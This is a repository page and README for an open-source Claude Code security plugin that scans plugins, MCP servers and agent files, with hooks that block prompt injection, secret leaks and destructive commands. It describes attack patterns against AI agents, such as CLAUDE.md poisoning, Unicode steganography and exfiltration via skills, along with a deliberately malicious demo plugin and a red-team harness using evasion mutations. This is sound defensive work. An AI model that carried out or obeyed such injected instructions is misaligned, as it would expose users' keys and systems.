ktg-plugin-marketplace/plugins/llm-security
2026-04-18 10:15:12 +02:00
..
.claude-plugin feat(llm-security): OS sandbox for /security ide-scan <url> (v6.5.0) 2026-04-17 17:28:57 +02:00
agents refactor(agents): add Step 0 + parallel-read hint to mcp-scanner-agent 2026-04-17 14:46:30 +02:00
bin feat(llm-security): /security ide-scan <url> — Marketplace/OpenVSX/direct VSIX (v6.4.0) 2026-04-17 17:16:26 +02:00
ci feat(ci): add CI/CD integration — --fail-on, --compact, pipeline templates 2026-04-10 14:59:05 +02:00
commands feat(llm-security): /security ide-scan <url> — Marketplace/OpenVSX/direct VSIX (v6.4.0) 2026-04-17 17:16:26 +02:00
docs docs(llm-security): research brief + URL-support plan for ide-scan 2026-04-17 18:47:01 +02:00
examples feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
hooks feat(hooks): register PreCompact event in hooks.json 2026-04-17 14:45:13 +02:00
knowledge docs(llm-security): add knowledge/jetbrains-marketplace-api-notes.md 2026-04-18 10:02:04 +02:00
reports feat(ms-ai-architect): add plugin to open marketplace (v1.5.0 baseline) 2026-04-07 17:17:17 +02:00
scanners feat(llm-security): implement parseIntelliJPlugin with nested-jar extraction 2026-04-18 10:15:12 +02:00
scripts feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
templates feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
test-fixtures/trifecta-plugin feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
tests feat(llm-security): implement parseIntelliJPlugin with nested-jar extraction 2026-04-18 10:15:12 +02:00
--json feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.editorconfig feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.gitignore feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.llm-security-ignore feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
.npmignore feat(ci): add CI/CD integration — --fail-on, --compact, pipeline templates 2026-04-10 14:59:05 +02:00
.orphaned_at feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
CHANGELOG.md feat(llm-security): OS sandbox for /security ide-scan <url> (v6.5.0) 2026-04-17 17:28:57 +02:00
CLAUDE.md feat(llm-security): OS sandbox for /security ide-scan <url> (v6.5.0) 2026-04-17 17:28:57 +02:00
LICENSE feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
package.json feat(llm-security): OS sandbox for /security ide-scan <url> (v6.5.0) 2026-04-17 17:28:57 +02:00
README.md feat(llm-security): OS sandbox for /security ide-scan <url> (v6.5.0) 2026-04-17 17:28:57 +02:00
SECURITY.md chore: fix metadata gaps and add root CLAUDE.md 2026-04-08 13:10:22 +02:00
V3-ANNOUNCEMENT.md feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00
V3-UPGRADE.md feat: initial open marketplace with llm-security, config-audit, ultraplan-local 2026-04-06 18:47:49 +02:00

LLM Security Plugin for Claude Code

Automated defense and advisory analysis for the agentic AI attack surface.

Built for my own Claude Code workflow and shared openly for anyone who finds it useful. This is a solo project — bug reports and feature requests are welcome, but pull requests are not accepted.

Version Platform Agents Scanners Hooks Knowledge License

A Claude Code plugin that provides security scanning, auditing, and threat modeling for agentic AI projects. Built on OWASP LLM Top 10 (2025), OWASP Agentic AI Top 10, and the AI Agent Traps taxonomy (Google DeepMind, 2025), with threat intelligence from ToxicSkills, ClawHavoc, MCPTox, Pillar Security, Invariant Labs, and Operant AI research.


Table of Contents


What Is This?

Claude Code plugins, MCP servers, and agentic workflows introduce attack surfaces that traditional security tools don't cover: prompt injection, tool poisoning, secret exfiltration through tool outputs, supply chain attacks via malicious skills, and excessive agency.

This plugin provides three layers of protection:

  • Automated enforcement — 9 hooks that block dangerous operations in real time (prompt injection in user input, secrets in code, writes to sensitive paths, destructive shell commands, supply chain guardrails, suspicious tool output, runtime trifecta detection, transcript scanning before context compaction, update notifications)
  • Deterministic scanning — 22 Node.js scanners (10 orchestrated + 12 standalone) that perform byte-level analysis LLMs cannot: Shannon entropy, Unicode codepoints, Levenshtein distance for typosquatting, source-to-sink taint flow, DNS resolution, git history forensics, toxic flow analysis, memory poisoning, live MCP inspection, AI-BOM generation, attack simulation, IDE extension prescan
  • Advisory analysis — 19 commands that scan, audit, and model threats with structured reports, letter grades, and actionable remediation plans

Key capabilities:

  • Supply chain gate — scan any plugin, MCP server, or agent file before installation with ALLOW/WARNING/BLOCK verdicts
  • Full project audit — evaluate 16 security categories with A-F grading and prioritized action items
  • Plugin trust assessment — dedicated plugin audit with Install/Review/Do Not Install verdict
  • MCP server audit — focused analysis of all installed MCP configurations with trust scoring
  • Threat modeling — interactive STRIDE × MAESTRO 7-layer session with risk matrix
  • Pre-deployment checklist — 10 automated + 3 manual checks before going to production
  • Automated remediation — scan-and-fix pipeline with 3-tier approach (auto/semi-auto/manual)
  • Continuous monitoring — recurring diff scanning via /security watch (uses built-in /loop) or system cron via watch-cron.mjs
  • Quick posture check — 30-second scorecard showing your security baseline (16 categories)

Tip

Start with /security posture for a 30-second baseline, then /security audit for the full picture.


The Extension Security Problem

Claude Code's extensibility model — skills, MCP servers, plugins, hooks — creates an attack surface that mirrors the npm/PyPI supply chain problem, but with a critical difference: extensions run with LLM agency. A malicious plugin doesn't just execute code in a sandbox; it can instruct an AI agent to read your SSH keys, exfiltrate environment variables, install persistence mechanisms, and modify its own configuration — all while appearing to be a helpful "Project Health Dashboard."

This is not theoretical. The ToxicSkills research (Xi'an Jiaotong, 2025) and ClawHavoc campaign (Repello AI, 2025) documented real attack patterns against agentic AI systems. The OWASP LLM Top 10 and OWASP Agentic AI Top 10 now formally categorize these threats.

We built a proof-of-concept — a single plugin called "Project Health Dashboard" that looks legitimate but embeds attacks across every threat category. When scanned with this plugin's combined LLM + deterministic analysis, it produced 85 findings: prompt injection via HTML comments, environment exfiltration via base64-encoded payloads, Unicode steganography invisible to human review, 6 typosquatting packages, 6 source-to-sink taint flows, persistence via crontab and LaunchAgents, and more. Verdict: BLOCK 100/100.

A human reviewing the plugin's README and SKILL.md would likely miss most of these. The Unicode Tag steganography is literally invisible. The base64 payload looks like a configuration block. The typosquatting packages are one character off from the real ones.

What organizations need:

  1. A pre-installation scan gate — automated analysis before any extension is installed (this plugin provides /security scan and /security plugin-audit)
  2. A trusted, curated marketplace — vetted extensions with security review as a prerequisite for listing
  3. Deterministic scanning — byte-level analysis for things LLMs cannot detect: Unicode codepoints, Shannon entropy, Levenshtein distance, source-to-sink taint flows
  4. Automated hooks — always-on primary defense blocking secrets in code, writes to sensitive paths, and destructive commands in real time

Important

Always scan repos remotely before cloning them. A poisoned CLAUDE.md injects instructions into the model context the moment you open a cloned repo — before any hooks can intervene. /security scan https://repo-url --deep analyzes everything safely via pre-extraction, without loading anything into your session. This is the primary defense against CLAUDE.md poisoning.


Quick Start

Prerequisites

  • Claude Code installed
  • Node.js (for automated hooks — .mjs scripts)

Important

If you use Opus with extended context (1M tokens): Subagents inherit the parent session's context limit but do not support extended context, causing API errors ("limit reached" or "extra usage required"). Fix: run /model Opus in your session before using any security commands. This resets the session to standard 200K context, which subagents handle correctly.

Installation

Add the marketplace and browse plugins with /plugin:

claude plugin marketplace add https://git.fromaitochitta.com/open/ktg-plugin-marketplace.git

Or enable directly in ~/.claude/settings.json:

{
  "enabledPlugins": {
    "llm-security@ktg-plugin-marketplace": true
  }
}

Note

Hooks activate immediately on installation. Secret detection, path guarding, and destructive command blocking start working without any commands.

First Scan

> /security posture

┌──────────────────────────────────────────────┐
│  Security Posture: 8/16  [B]  77%            │
│  ████████████████░░░░░░░░░░                  │
├──────────────────────────────────────────────┤
│  ✅ Deny-First Config                        │
│  ✅ Secrets Protection                        │
│  ✅ Path Guarding                             │
│  ⚠️  MCP Server Trust                         │
│  ✅ Destructive Command Blocking              │
│  ⚠️  Sandbox Config                           │
│  ⚠️  Human Review                             │
│  ✅ Skill/Plugin Sources                      │
│  ⚠️  Session Isolation                        │
│  ✅ Cognitive State Security                  │
│  ✅ Prompt Injection Hardening                │
│  ⚠️  Rule of Two                              │
│  ⚠️  Long-Horizon Monitoring                  │
│  ✅ EU AI Act                                 │
│  ⚠️  NIST AI RMF                              │
│  —  ISO 42001                                │
├──────────────────────────────────────────────┤
│  6 findings (1 high, 3 medium, 2 low)        │
└──────────────────────────────────────────────┘

Commands

Scanning & Assessment

Command Description
/security Overview of all commands and quick start guide
/security scan [path|url] Scan skills, MCP servers, directories, or GitHub repos for security issues
/security scan [path|url] --deep Enhanced scan: LLM agents + 10 deterministic scanners
/security deep-scan [path] Run 10 deterministic Node.js scanners directly (entropy, unicode, taint, deps, git, permissions, network, memory poisoning, supply chain recheck, toxic flow). Supports --fail-on <severity>, --compact, --format sarif, --output-file <path>
/security audit Full project security audit with A-F grading and remediation plan
/security plugin-audit [path|url] Dedicated plugin security audit with Install/Review/Do Not Install verdict (local or GitHub URL)
/security mcp-audit [--live] Focused audit of all installed MCP server configurations (add --live for runtime inspection)
/security mcp-inspect Connect to running MCP stdio servers and scan live tool descriptions
/security ide-scan [target|url] Scan installed VS Code (+ Cursor, Windsurf, VSCodium, code-server) / JetBrains extensions — OR fetch a remote VSIX from VS Code Marketplace, OpenVSX, or direct .vsix URL (v6.4.0). Typosquat, theme-with-code, sideload, broad activation, uninstall hooks, plus UNI/ENT/NET/TNT/MEM/SCR per extension. Offline by default
/security posture Quick security posture scorecard (16 categories incl. compliance)
/security diff [path] Compare scan against stored baseline — shows new/resolved/unchanged/moved findings
/security watch [path] [--interval 6h] Continuous monitoring — runs diff on a recurring interval via /loop
/security registry [scan|search] Skill signature registry — view stats, scan+register skills, search known fingerprints

Remediation

Command Description
/security clean [path] Scan and remediate findings — auto-fix, semi-auto confirm, manual report
/security clean [path] --dry-run Preview what would be fixed without modifying files
/security harden [path] Generate Grade A security config — settings.json, CLAUDE.md, .gitignore
/security harden [path] --apply Apply generated config with automatic backup

Threat Modeling & Planning

Command Description
/security threat-model Interactive STRIDE/MAESTRO threat modeling session (15-30 min)
/security red-team [--category] [--adaptive] Attack simulation — 64 scenarios across 12 categories test hook defenses. --adaptive for mutation-based evasion testing
/security pre-deploy Pre-deployment security checklist (10 automated + 3 manual checks)

Scan

/security scan is a supply chain gate. Point it at any local path or GitHub URL before installation. It spawns specialized agents sequentially to analyze:

  • Skills/agents: 7 threat categories (injection, exfiltration, privilege escalation, scope creep, hidden instructions, toolchain manipulation, persistence)
  • MCP servers: 5-phase analysis (tool descriptions, source code, dependencies, configuration, rug pull detection)

Remote repo support (v2.4+): Pass a GitHub URL directly — the plugin clones to a temp directory, scans, and cleans up. Use --branch <name> for non-default branches:

/security scan https://github.com/org/repo --branch dev --deep

Injection-safe remote scanning (v2.5+): Remote scans pre-extract structured evidence via content-extractor.mjs and strip injection patterns BEFORE LLM agents see the content. Agents analyze a JSON evidence package, never raw files from untrusted repos. [INJECTION-PATTERN-STRIPPED] markers are confirmed findings.

Sandboxed cloning (v5.1+): git clone can execute arbitrary code via .gitattributes filter/smudge drivers (CVE-2024-32002 and related). Remote clones are now hardened with defense-in-depth:

Layer 1 — Git config hardening (all platforms): 8 config flags neutralize known attack vectors:

Flag Mitigates
core.hooksPath=/dev/null Git hooks executed during clone/checkout
core.symlinks=false Symlink traversal out of temp directory
core.fsmonitor=false Arbitrary command execution via fsmonitor
filter.lfs.{process,smudge,clean}= Filter/smudge driver code execution (.gitattributes)
protocol.file.allow=never Local file protocol traversal
transfer.fsckObjects=true Malformed git objects

Environment variables (GIT_CONFIG_NOSYSTEM=1, GIT_CONFIG_GLOBAL=/dev/null, GIT_ATTR_NOSYSTEM=1, GIT_TERMINAL_PROMPT=0) isolate from system/user git config and block interactive prompts.

Layer 2 — OS-level filesystem sandbox (platform-dependent):

Platform Sandbox How it works Limitations
macOS sandbox-exec Restricts file writes to only the clone temp dir via Seatbelt profiles Deprecated by Apple but still functional (no replacement exists)
Linux bubblewrap (bwrap) Read-only root bind mount + writable clone dir + namespace isolation Requires bwrap package. Fails on Ubuntu 24.04+ without admin AppArmor config. Works on Fedora/Arch
Windows None available Git config hardening only (Layer 1) See Windows guidance below

The plugin probe-tests sandbox availability at runtime and falls back gracefully. When no OS sandbox is available, a WARN is logged and cloning proceeds with git config hardening only.

Additional protections: Post-clone size check (100MB max), UUID-unique evidence filenames (prevents race conditions), cleanup guarantee (temp files removed even on error).

Windows guidance: Windows has no CLI-level filesystem sandbox equivalent to sandbox-exec or bwrap. The alternatives either require additional software or admin privileges:

Option Isolation level Requirements
Windows Sandbox Full VM (Hyper-V) Windows Pro/Enterprise, Hyper-V enabled. GUI-oriented, not scriptable
Docker Desktop Container Requires Docker install. Best option for automated isolation
WSL2 Linux VM Requires WSL2 install. Once inside, bwrap is available (except Ubuntu 24.04+ caveat)
AppContainer Process sandbox Requires native C++ helper binary — not practical to ship in a Node.js plugin

Recommendation for Windows users: Run Claude Code inside WSL2 or Docker Desktop for full sandbox coverage. The git config hardening (Layer 1) provides baseline protection on all platforms and neutralizes all known .gitattributes attack vectors even without an OS sandbox.

Why not Node.js --permission? Node's permission model restricts fs module access within the Node process, but does not sandbox child processes like git which run as separate OS processes. It is therefore not useful for this use case.

Output: structured report with ALLOW / WARNING / BLOCK verdict, risk score (0-100), and findings sorted by severity.

Audit

/security audit is a comprehensive project review. It spawns up to 3 agents to evaluate 9 security categories:

  1. Secret management
  2. Permission model
  3. Input validation
  4. Output handling
  5. Supply chain
  6. Data protection
  7. Logging and monitoring
  8. Network security
  9. Agent autonomy controls

Output: A-F letter grade, risk matrix, and prioritized action items.

Plugin Audit

/security plugin-audit [path|url] is a dedicated trust assessment for Claude Code plugins. Point it at any local plugin directory or GitHub URL to get a comprehensive evaluation before installation. It analyzes:

  • Manifest metadata — name, version, author, auto_discover settings
  • Component inventory — commands, agents, hooks, skills with tool grants
  • Permission matrix — aggregated tool access across all components, flagging Bash, Write+Bash, and Task access
  • Hook safety — classifies hook behavior (block/warn/advisory), flags state-modifying or network-calling hooks
  • Content scan — spawns skill-scanner-agent for 7 threat categories

Output: structured report with Install / Review / Do Not Install trust verdict.

Clean

/security clean is a scan-and-remediate pipeline. It runs the full deterministic scanner suite, classifies each finding into one of three tiers, and acts accordingly:

  • Auto — Deterministic, safe fixes applied without confirmation (e.g., removing zero-width characters, BIDI overrides, Unicode Tag steganography, upgrading haiku models)
  • Semi-auto — Fixes generated by an LLM agent, presented for user confirmation before applying (e.g., homoglyph replacement, permission adjustments, dependency fixes)
  • Manual — Findings that require human judgment, included in the report but not auto-fixed (e.g., taint flow refactoring, architecture changes)

The remediation engine (auto-cleaner.mjs) performs 16 fix operations as pure functions (content → content) with atomic writes and post-fix validation. Use --dry-run to preview all proposed changes without modifying any files.

Threat Model

/security threat-model runs a guided 15-30 minute interview session that maps your system through two frameworks:

  • STRIDE — Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege
  • MAESTRO 7-layer model — Foundation Models, Data/Knowledge, Agent Frameworks, Tool Integration, Agent Capabilities, Multi-Agent Systems, Ecosystem

Output: complete threat model document with prioritized threats, risk scores, and mitigation status.


Agent Architecture

The plugin delegates specialized work to 6 purpose-built agents. Each agent has focused threat detection capabilities and its own knowledge base routing.

Agent Role Model Spawned By Tools
skill-scanner-agent 7 threat categories (injection, exfiltration, escalation, scope creep, hidden instructions, toolchain manipulation, persistence) Opus /security scan, /security audit, /security plugin-audit Read, Glob, Grep
mcp-scanner-agent 5-phase MCP analysis (tool descriptions, source code, dependencies, config, rug pull detection) Opus /security scan, /security mcp-audit Read, Glob, Grep, Bash
posture-assessor-agent 16-category assessment with PASS/PARTIAL/FAIL scoring and A-F grading Opus /security audit, /security posture Read, Glob, Grep
threat-modeler-agent Interactive STRIDE × MAESTRO 7-layer interview with 5-phase workflow Opus /security threat-model Read, Glob, Grep, AskUserQuestion
deep-scan-synthesizer-agent Interprets deterministic scanner JSON into human-readable report with executive summary and prioritized recommendations Opus /security deep-scan, /security scan --deep Read, Glob, Grep
cleaner-agent Generates semi-auto remediation proposals for findings requiring human judgment (read-only, returns JSON proposals) Opus /security clean Read, Glob, Grep

Scan Pipelines

For commands like /security audit, the plugin orchestrates multiple agents in parallel:

                  ┌──────────────┐
                  │  /security   │
                  │    audit     │
                  └──────┬───────┘
                         │
            ┌────────────┼────────────┐
            ▼            ▼            ▼
   ┌─────────────┐ ┌───────────┐ ┌──────────┐
   │    Skill    │ │    MCP    │ │ Posture  │
   │   Scanner   │ │  Scanner  │ │ Assessor │
   └──────┬──────┘ └─────┬─────┘ └────┬─────┘
          │              │             │
          └──────────────┼─────────────┘
                         ▼
                ┌────────────────┐
                │  Audit Report  │
                │  (A-F grade)   │
                └────────────────┘

For deep scans (/security scan --deep or /security deep-scan), deterministic scanners run in parallel followed by synthesis:

                  ┌──────────────┐
                  │  /security   │
                  │  scan --deep │
                  └──────┬───────┘
                         │
         ┌───────────────┼───────────────┐
         ▼               ▼               ▼
   ┌───────────┐  ┌────────────┐  ┌────────────┐
   │ LLM Skill │  │   10 Det.  │  │    MCP     │
   │  Scanner  │  │  Scanners  │  │  Scanner   │
   └─────┬─────┘  └──────┬─────┘  └──────┬─────┘
         │        UNI ENT PRM     │
         │        DEP TNT GIT     │
         │        NET MEM SCR TFA │
         │               │               │
         │        ┌──────┴─────┐         │
         │        │ Synthesizer│         │
         │        │   Agent    │         │
         │        └──────┬─────┘         │
         └───────────────┼───────────────┘
                         ▼
                ┌────────────────┐
                │ Combined Report│
                │ (BLOCK/WARN/OK)│
                └────────────────┘

Deterministic Scanners

10 orchestrated + 12 standalone Node.js scanner scripts that perform byte-level analysis an LLM cannot. Zero external dependencies. Orchestrated scanners run via node scanners/scan-orchestrator.mjs <target> or through /security deep-scan. Supports --fail-on <severity>, --compact, --format sarif, --output-file <path>.

Orchestrated (10)

Scanner Prefix Detects OWASP
unicode-scanner.mjs UNI Zero-width chars, Unicode Tag steganography, BIDI overrides, Cyrillic homoglyphs LLM01
entropy-scanner.mjs ENT High-entropy strings, base64/hex blobs, encoded payloads via Shannon entropy LLM01, LLM03
permission-mapper.mjs PRM Purpose-vs-tools mismatch, ghost hooks, haiku on sensitive agents, overprivileged components LLM06
dep-auditor.mjs DEP CVEs (npm/pip audit), typosquatting (Levenshtein distance), malicious install scripts, unpinned versions LLM03
taint-tracer.mjs TNT Source-to-sink data flow (process.env/req.body to eval/exec/fetch/writeFile), 3-pass analysis LLM01, LLM02
git-forensics.mjs GIT Force pushes, description drift, hook modifications, new outbound URLs, author changes LLM03
network-mapper.mjs NET Undisclosed URLs, suspicious domains (ngrok, webhook.site), IP-based URLs, DNS analysis LLM02, LLM03
memory-poisoning-scanner.mjs MEM Injection patterns, shell commands, credential paths, permission expansion, suspicious URLs, encoded payloads in CLAUDE.md/memory/rules files LLM01, ASI02
supply-chain-recheck.mjs SCR Re-audit installed deps from lockfiles against blocklists, OSV.dev batch API, typosquat detection LLM03
toxic-flow-analyzer.mjs TFA Lethal trifecta detection: untrusted input + sensitive data access + exfiltration sink. Cross-component correlation (runs last) ASI01, ASI02, ASI05

Standalone (12)

Scanner Prefix Purpose
scan-orchestrator.mjs Entry point: runs all 10 orchestrated scanners, outputs JSON
posture-scanner.mjs PST Deterministic posture assessment, 16 categories (incl. EU AI Act, NIST AI RMF, ISO 42001), <50ms
mcp-live-inspect.mjs MCI Live MCP server inspection via JSON-RPC 2.0 (tool injection, shadowing, URL/IP)
ide-extension-scanner.mjs IDE VS Code (+ Cursor, Windsurf, VSCodium, code-server) / JetBrains extension prescan: blocklist, theme-with-code, sideload, broad activation, typosquat, extension-pack expansion, dangerous uninstall hooks — then UNI/ENT/NET/TNT/MEM/SCR per extension
attack-simulator.mjs Red-team harness: 64 scenarios, 12 categories, adaptive mutation mode
ai-bom-generator.mjs BOM CycloneDX 1.6 AI Bill of Materials
dashboard-aggregator.mjs Cross-project security dashboard, machine-grade aggregation
reference-config-generator.mjs Grade A config generation based on posture gaps
supply-chain-recheck-cli.mjs CLI wrapper for SCR scanner
auto-cleaner.mjs Remediation engine: 16 fix operations, atomic writes, post-fix validation
content-extractor.mjs Pre-extracts evidence from untrusted repos, strips injection patterns
watch-cron.mjs Cron wrapper: scans all targets in config, writes summary, exits with verdict code

Why deterministic? LLMs are powerful at semantic analysis — understanding intent, detecting social engineering, assessing context. But they cannot reliably calculate Shannon entropy, measure Levenshtein distance between package names, trace taint flow across function boundaries, or detect individual Unicode codepoints. These scanners fill that gap.

Shared library (scanners/lib/): severity classification, string utilities (entropy, Levenshtein, base64 detection), output formatting, file discovery, and YAML frontmatter parsing.


Automated Hooks

These hooks run on every operation — no commands needed. They activate the moment the plugin is installed.

Hook Event What It Does
Prompt injection scan UserPromptSubmit Blocks direct prompt injection (override instructions, spoofed headers, identity redefinition); warns on subtle manipulation signals. Decodes obfuscated payloads (unicode, hex, URL, base64) before matching. Configurable: LLM_SECURITY_INJECTION_MODE=block|warn|off (default: block)
Secret detection Edit, Write Blocks AWS keys, Azure tokens, GitHub PATs, npm tokens, PEM keys, database URLs, Bearer tokens, passwords (13 patterns)
Path guarding Write Blocks writes to .env, .ssh/, .aws/, .gnupg/, credentials files, hook scripts, /etc/, settings.json (8 path categories)
Destructive commands Bash Blocks rm -rf /, chmod 777, pipe-to-shell, fork bombs, eval injection (8 block rules + 6 warnings)
Supply chain guardrail Bash Blocks known-compromised npm/pip packages, typosquatting (Levenshtein), age-gated installs (<72h), OSV.dev CVE checks across 7 package managers
Output verification All tools (post) Advisory: scans ALL tool output for indirect prompt injection (LLM01). Bash-specific: also flags leaked secrets, unexpected URLs, oversized MCP responses. Skips short output (<100 chars) for performance
Session guard All tools (post) Advisory: monitors tool call sequences for lethal trifecta (untrusted input + sensitive data access + exfiltration sink). Sliding window of 20 calls, per-session JSONL state, warns when all 3 legs present (OWASP ASI01, ASI02)
Update check UserPromptSubmit Checks for newer plugin versions (max 1x/24h, cached). Disable: LLM_SECURITY_UPDATE_CHECK=off

All hooks are Node.js (.mjs) for cross-platform compatibility (macOS, Linux, Windows).

Important

Prompt injection scan, secret detection, path guarding, destructive commands, and supply chain guardrail are blocking — they prevent the operation if a pattern matches. Output verification and session guard are advisory — they warn but do not block. Update check is informational — notifies when a newer version is available. Prompt injection blocking can be changed to warn-only (LLM_SECURITY_INJECTION_MODE=warn) or disabled (off) for security research or testing environments. Update check can be disabled with LLM_SECURITY_UPDATE_CHECK=off.


Knowledge Base

18 research-backed reference files grounding all analysis in published threat intelligence:

File Scope
owasp-llm-top10.md OWASP LLM Top 10 (2025) — attack vectors, detection signals, Claude Code mitigations
owasp-agentic-top10.md OWASP Agentic AI Top 10 (ASI01-ASI10) — agent-specific threats mapped to Claude Code
owasp-skills-top10.md OWASP Skills Top 10 (AST01-AST10) — skill-specific threats and mitigations
skill-threat-patterns.md 7 threat categories from ToxicSkills/ClawHavoc research with concrete detection patterns
mcp-threat-patterns.md 9 MCP threat categories from MCPTox/Pillar Security/Invariant Labs/Operant AI research
secrets-patterns.md 30+ regex patterns for secret detection across 10 provider categories
mitigation-matrix.md OWASP LLM Top 10 → Claude Code control mapping with verification checks and coverage scores
top-packages.json Top 200 npm + top 100 PyPI package names for typosquatting detection (Levenshtein baseline)
skill-registry.json Seed data for skill signature registry — known fingerprints and risk profiles
compliance-mapping.md EU AI Act, NIST AI RMF, ISO 42001, MITRE ATLAS — article/control mappings to plugin capabilities
norwegian-context.md Norwegian regulatory landscape — Datatilsynet, NSM, Digitaliseringsdirektoratet guidance for AI security
prompt-injection-research-2025-2026.md 7 research papers (2025-2026) with implications for hook defenses
deepmind-agent-traps.md DeepMind AI Agent Traps — 6 categories, 43 techniques, coverage matrix
attack-scenarios.json 64 red-team scenarios across 12 categories for attack simulation
attack-mutations.json Synonym tables and mutation rules for adaptive red-team testing
typosquat-allowlist.json Allowlisted package names to reduce false positives in typosquatting detection
ide-extension-threat-patterns.md 10 IDE-extension detection categories (VS Code + JetBrains) with 2024-2026 case studies (GlassWorm, WhiteCobra, TigerJack, Material Theme)
top-vscode-extensions.json Top ~100 VS Code Marketplace extension IDs (Levenshtein typosquat seed) + blocklist of known-malicious publisher.name entries

Note

All knowledge base content is derived from published OWASP standards and peer-reviewed security research. The knowledge files provide grounding for agent analysis — agents read relevant sections before producing findings.


Compliance & Governance

v6.0.0 adds an enterprise governance layer for standards-aware security operations:

Capability Description
Compliance Mapping Maps plugin capabilities to EU AI Act (Art. 9, 15, 17), NIST AI RMF (Map, Measure, Manage, Govern), ISO 42001 (Annex A), and MITRE ATLAS techniques. Posture categories 14-16 assess compliance readiness.
Norwegian Context Regulatory guidance from Datatilsynet (DPIA for AI), NSM (basic security principles), and Digitaliseringsdirektoratet. Relevant for Norwegian public sector AI deployments.
SARIF 2.1.0 Output --format sarif flag on scan/deep-scan produces OASIS SARIF standard output for CI/CD integration (GitHub Advanced Security, Azure DevOps, SonarQube).
Structured Audit Trail JSONL audit events (audit-trail.mjs) with ISO 8601 timestamps, OWASP category tags, and SIEM-ready schema. Configurable via LLM_SECURITY_AUDIT_* env vars.
AI-BOM CycloneDX 1.6 Bill of Materials for AI components — models, MCP servers, plugins, knowledge files, hooks. llm-security audit-bom <target>.
Policy-as-Code .llm-security/policy.json for distributable hook configuration. Teams can enforce consistent security thresholds without per-developer env var setup.
Standalone CLI node bin/llm-security.mjs scan <target> — runs scanners without Claude Code. Subcommands: scan, posture, audit-bom, benchmark.
CI/CD Integration --fail-on <severity> for threshold-based exit codes, --compact for one-liner output. Pipeline templates for GitHub Actions, Azure DevOps, GitLab CI in ci/. Guide: docs/ci-cd-guide.md.

Benchmarks

The attack simulator (llm-security benchmark) tests hook defenses with 64 crafted scenarios across 12 categories. Adaptive mode (--adaptive) applies 5 mutation rounds per passing scenario (homoglyph substitution, encoding variations, zero-width injection, case alternation, synonym replacement).


OWASP Coverage

Category Automated (Hooks) Deterministic (Scanners) Advisory (Commands) Coverage
LLM01 Prompt Injection Strong (input + output) UNI + ENT + TNT Scan, Audit 95%
LLM02 Sensitive Info Disclosure Strong TNT + NET Audit 83%
LLM03 Supply Chain Partial ENT + DEP + GIT + NET Scan, Plugin Audit, MCP Audit 60%
LLM04 Data Poisoning Threat Model 40%
LLM05 Improper Output Handling Strong (output scan) Audit 83%
LLM06 Excessive Agency Strong PRM Posture 100%
LLM07 System Prompt Leakage Audit 60%
LLM08 Vector/Embedding Weaknesses Threat Model 40%
LLM09 Misinformation Advisory 50%
LLM10 Unbounded Consumption Pre-Deploy 83%

Average coverage: ~69%. Percentages reflect control-count coverage from knowledge/mitigation-matrix.md. Strongest in prompt injection (LLM01, 95% with runtime input/output scanning + obfuscation decoding) and agency controls (LLM06, 100%). Weakest in areas requiring model-provider or infrastructure controls (LLM04, LLM08), which are better addressed at the platform level.


Workflow Examples

1. Pre-Installation Gate

Evaluate a plugin or MCP server before installing it — locally or from a remote repo:

/security scan path/to/plugin          # Quick scan with ALLOW/WARNING/BLOCK verdict
/security plugin-audit path/to/plugin  # Deep trust assessment with Install/Review/Do Not Install
                                       # → Install if both pass, investigate if flagged

# Remote repo — scans without installing (v2.4+)
/security scan https://github.com/org/repo --deep
/security scan https://github.com/org/repo --branch dev --deep
/security plugin-audit https://github.com/org/repo

2. Monthly Security Review

Regular cadence for maintaining security posture:

/security posture                      # 30-second baseline scorecard (16 categories)
/security audit                        # Full audit with A-F grade and action items
                                       # → Fix critical/high findings
/security posture                      # Verify improvement

3. Track Security Over Time

Compare scan results against a stored baseline to see what changed:

/security diff path/to/project         # First run creates baseline, subsequent runs show delta
                                       # → Shows new, resolved, unchanged, and moved findings
/security watch path/to/project        # Continuous: runs diff every 6h via /loop

4. Deep Threat Analysis

For new architectures, major changes, or compliance requirements:

/security threat-model                 # 15-30 min guided STRIDE × MAESTRO session
/security audit                        # Verify current controls against identified threats
/security pre-deploy                   # Pre-deployment checklist before production

5. Remediation

Fix findings from scans and audits:

/security clean path/to/project --dry-run   # Preview fixes without modifying files
/security clean path/to/project             # Auto-fix safe issues, confirm semi-auto, report manual
                                            # → Review semi-auto proposals, handle manual findings

Prompt Injection Showcase (v5.0)

The examples/prompt-injection-showcase/ demonstrates runtime hook detection against 61 attack payloads across 19 categories — from classic instruction overrides to v5.0's Unicode steganography, HITL traps, NL indirection, hybrid P2SQL, and bash evasion techniques. Includes 6 false positive checks.

node examples/prompt-injection-showcase/run-showcase.mjs           # Run all 61 payloads
node examples/prompt-injection-showcase/run-showcase.mjs --verbose # Show hook output

See examples/prompt-injection-showcase/README.md for the full category breakdown.


Security Assessment Demo

The examples/malicious-skill-demo/ directory contains a deliberately malicious plugin called "Project Health Dashboard" and a full security assessment produced by the combined LLM + deterministic scanning pipeline.

What it demonstrates: A single plugin that looks like a legitimate project health monitoring tool but embeds attacks across every threat category — prompt injection, data exfiltration, Unicode steganography, typosquatting, taint flows, persistence mechanisms, and more.

Key stats:

  • 85 total findings (24 Critical, 24 High, 20 Medium, 6 Low, 11 Info)
  • Verdict: BLOCK 100/100 — both LLM and deterministic scanners independently maxed the risk score
  • All 9 deterministic scanners active — every scanner found findings
  • 25 LLM findings detecting semantic patterns (social engineering, intent, context normalization)
  • 60 deterministic findings detecting byte-level patterns (entropy, Unicode codepoints, taint flow, Levenshtein distance)

Run it yourself:

# Deterministic scanners only (~5 seconds)
node scanners/scan-orchestrator.mjs examples/malicious-skill-demo/evil-project-health/

